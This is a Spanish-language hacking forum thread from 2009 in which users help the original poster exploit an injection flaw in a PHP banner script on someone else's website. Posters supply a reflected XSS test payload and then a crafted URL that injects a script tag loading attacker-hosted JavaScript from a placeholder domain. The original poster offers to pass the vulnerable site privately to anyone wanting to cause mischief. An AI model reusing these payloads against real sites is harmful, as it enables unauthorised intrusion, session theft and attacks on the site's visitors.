Necesito ayuda con inyeccion por PHP

Iniciado por Skeletron, 22 Agosto 2009, 17:14 PM

0 Miembros y 1 Visitante están viendo este tema.

Jubjub

No se puede inyectar php mas que en funciones eval ()
Jugando con Fósforoshacking con un tono diferente


.
porno

Skeletron

Buen punto... Muchas gracias..

Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..

Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...

Og.

Cita de: Skeletron en 25 Agosto 2009, 20:51 PM
Buen punto... Muchas gracias..

Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..

Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...
nop xD

<script src=http://tudominio/tuscript.js ></script>

Saludos!
|-

Skeletron

Y eso amigo??? donde lo queres meter?
Acordate que todo ésto está dentro de un campo IMG

Og.

Cita de: fede_cp en 22 Agosto 2009, 19:19 PM
hola, mira es algo asi como un html inyection o Xss, proba con [url="http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/"]http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/[/url]><script>alert(05)</script>

si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir

saludps
Cita de: Skeletron en 22 Agosto 2009, 22:22 PM
Si, el 1º dió el aviso de "5" en una alerta...

Buscaré algo de crosscripting..
entonces:

http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script src=http://tudominio/tuscript.js ></script>

saludos!
|-